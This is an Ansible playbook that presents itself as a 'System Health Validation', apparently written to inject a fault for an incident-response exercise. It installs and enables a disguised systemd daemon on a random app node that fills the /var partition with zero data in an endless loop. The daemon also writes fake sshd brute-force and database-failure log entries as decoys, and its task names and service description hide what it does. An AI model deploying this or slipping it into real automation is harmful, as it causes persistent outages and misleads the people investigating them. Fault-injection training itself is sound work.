---
- name: "System Health Validation"
  hosts: localhost
  connection: local
  gather_facts: false
  tasks:
    - name: "10"
      ansible.builtin.set_fact:
        target_node: "{{ groups['app_nodes'] | random }}"

    - name: "20"
      ansible.builtin.add_host:
        name: "{{ target_node }}"
        groups: incident_002_target

    - name: "30"
      ansible.builtin.debug:
        msg: "Target selected."

- name: "System Health Validation - Execution"
  hosts: incident_002_target
  become: true
  gather_facts: true
  tasks:
    - name: "40"
      ansible.builtin.stat:
        path: /var/log/.audit_sync_marker
      register: check_inject

    # --- CAUSA RAÍZ REAL: Llenar el disco con un daemon ---
    - name: "50"
      ansible.builtin.copy:
        dest: /usr/local/bin/sys-audit-sync.sh
        mode: '0755'
        content: |
          #!/bin/bash
          while true; do
            # Genera datos masivos para llenar la partición /var rápidamente
            dd if=/dev/zero bs=1M count=50 >> /var/log/sys-audit.log 2>/dev/null
            
            # --- FALSO POSITIVO 1: Errores falsos de seguridad (Hackeo) ---
            logger -p authpriv.err "sshd: Failed password for invalid user admin from 192.168.99.99 port 44312 ssh2"
            logger -p authpriv.err "sshd: Failed password for invalid user root from 192.168.99.99 port 44313 ssh2"
            
            # --- FALSO POSITIVO 2: Errores falsos de Base de Datos ---
            logger -p local0.err "php: SQLSTATE[08006] [7] connection to server at \"10.10.10.40\", port 5432 failed: Connection refused"
            
            sleep 2
          done
      when: not check_inject.stat.exists

    - name: "60"
      ansible.builtin.copy:
        dest: /etc/systemd/system/sys-audit-sync.service
        mode: '0644'
        content: |
          [Unit]
          Description=System Audit Log Synchronization Daemon
          After=network.target

          [Service]
          Type=simple
          ExecStart=/usr/local/bin/sys-audit-sync.sh
          Restart=always
          RestartSec=3

          [Install]
          WantedBy=multi-user.target
      when: not check_inject.stat.exists

    - name: "70"
      ansible.builtin.systemd:
        name: sys-audit-sync
        state: started
        enabled: true
        daemon_reload: true
      when: not check_inject.stat.exists

    - name: "80"
      ansible.builtin.file:
        path: /var/log/.audit_sync_marker
        state: touch
        mode: '0600'
      when: not check_inject.stat.exists

    - name: "90"
      ansible.builtin.debug:
        msg: "Validation completed."
